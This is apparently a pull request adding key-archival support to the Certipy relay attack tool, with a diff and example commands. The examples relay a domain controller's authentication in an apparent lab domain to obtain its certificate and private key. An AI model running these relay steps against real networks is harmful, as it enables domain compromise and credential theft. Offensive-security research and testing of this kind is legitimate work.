### PR TITLE
Add Support for Key Archival in certipy relay

### DIFF
--- a/certipy/commands/parsers/relay.py
+++ b/certipy/commands/parsers/relay.py
@@ -55,6 +55,11 @@ def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable
         default=2048,
         type=int,
     )
+    group.add_argument(
+        "-archive-key",
+        action="store",
+        help="Specify CAX Certificate for Key Archival, you can request the cax cert with 'certipy req -cax-cert'",
+    )
 
     group = subparser.add_argument_group("output options")
     group.add_argument("-out", action="store", metavar="output file name")

--- a/certipy/commands/parsers/req.py
+++ b/certipy/commands/parsers/req.py
@@ -67,6 +67,11 @@ def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable
         help="Send private key for Key Archival",
     )
     group.add_argument(
+        "-cax-cert",
+        action="store_true",
+        help="Retrieve CAX Cert for relay with enabled Key Archival",
+    )
+    group.add_argument(
         "-renew",
         action="store_true",
         help="Create renewal request",

--- a/certipy/commands/req.py
+++ b/certipy/commands/req.py
@@ -29,6 +29,7 @@ from certipy.lib.certificate import (
     load_pfx,
     pem_to_cert,
     pem_to_key,
+    cert_to_der,
     rsa,
     x509,
 )
@@ -531,6 +532,7 @@ class Request:
         pfx: str = None,
         key_size: int = None,
         archive_key: bool = False,
+        cax_cert: bool = False,
         renew: bool = False,
         out: str = None,
         key: rsa.RSAPrivateKey = None,
@@ -553,6 +555,7 @@ class Request:
         self.pfx = pfx
         self.key_size = key_size
         self.archive_key = archive_key
+        self.cax_cert = cax_cert
         self.renew = renew
         self.out = out
         self.key = key
@@ -754,12 +757,34 @@ class Request:
 
         return pfx, outfile
 
+    def getCAX(self) -> bool:
+        username = self.target.username
+
+        ca = CA(self.target, self.ca)
+        logging.info("Trying to retrieve CAX certificate")
+        cax_cert = ca.get_exchange_certificate()
+        logging.info("Retrieved CAX certificate")     
+        cax_cert = cert_to_der(cax_cert)
+
+        return cax_cert
+
 
 def entry(options: argparse.Namespace) -> None:
     target = Target.from_options(options)
     del options.target
 
     request = Request(target=target, **vars(options))
+
+    if options.cax_cert:
+        if not options.out:
+            logging.error("Please specify an output file for the cax certificate!")
+            return
+        
+        cax = request.getCAX()
+        with open(options.out, "wb") as f:
+            f.write(cax)
+        logging.info("CAX certificate save to %s" % options.out)
+        return
 
     if options.retrieve:
         request.retrieve()


### PR DESCRIPTION
This adds support for templates with the RequirePrivateKeyArchival flag in certipy relay.

- The CAX certificate can be retrieved via certipy req -cax-cert -out <file>.
- New -archive-key <file> option allows specifying a CAX certificate to wrap the CSR for key archival.

This enables ESC8/ESC11 attacks to work against CAs that require private key archival.

Example:
Get the cax certificate:
```
$ certipy req -u "missandei@essos.local" -p "fr3edom" -ca "ESSOS-CA" -target braavos.essos.local -cax-cert -out cax.cert
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Trying to retrieve CAX certificate
[*] Retrieved CAX certificate
[*] CAX certificate save to cax.cert
```
Use it in the relay:
```
$ certipy relay -target braavos.essos.local -template "TESTDomainControllerAuthentication" -ca ESSOS-CA -archive-key cax.cert
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting http://braavos.essos.local/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[]
ESSOS\MEEREEN$
[*] Trying to retrieve CAX certificate from file cax.cert
[]
[*] Retrieved CAX certificate
[*] Requesting certificate for 'ESSOS\\MEEREEN$' based on the template 'TESTDomainControllerAuthentication'
[*] Got certificate with DNS Host Name 'meereen.essos.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'meereen.pfx'
[*] Exiting...
```